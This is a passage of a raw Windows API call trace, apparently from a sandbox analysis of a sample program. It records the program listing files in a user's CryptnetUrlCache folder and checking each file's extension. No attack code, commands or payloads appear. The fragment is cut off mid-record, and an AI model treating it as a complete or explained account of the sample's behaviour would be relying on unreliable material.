lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0206.572] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bf70 | out: hHeap=0x2c0000) returned 1 [0206.572] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.572] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.572] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.573] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.573] PathFindFileNameW (pszPath="") returned="" [0206.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77ad8 | out: hHeap=0x2c0000) returned 1 [0206.575] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0206.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0206.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.576] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0206.577] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0206.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.577] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0206.578] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0206.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.578] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0206.578] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0206.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.578] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0206.578] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0206.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.578] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0206.578] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0206.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.578] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0206.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0206.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.579] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0206.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0206.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.579] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0206.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0206.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.579] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0206.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0206.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 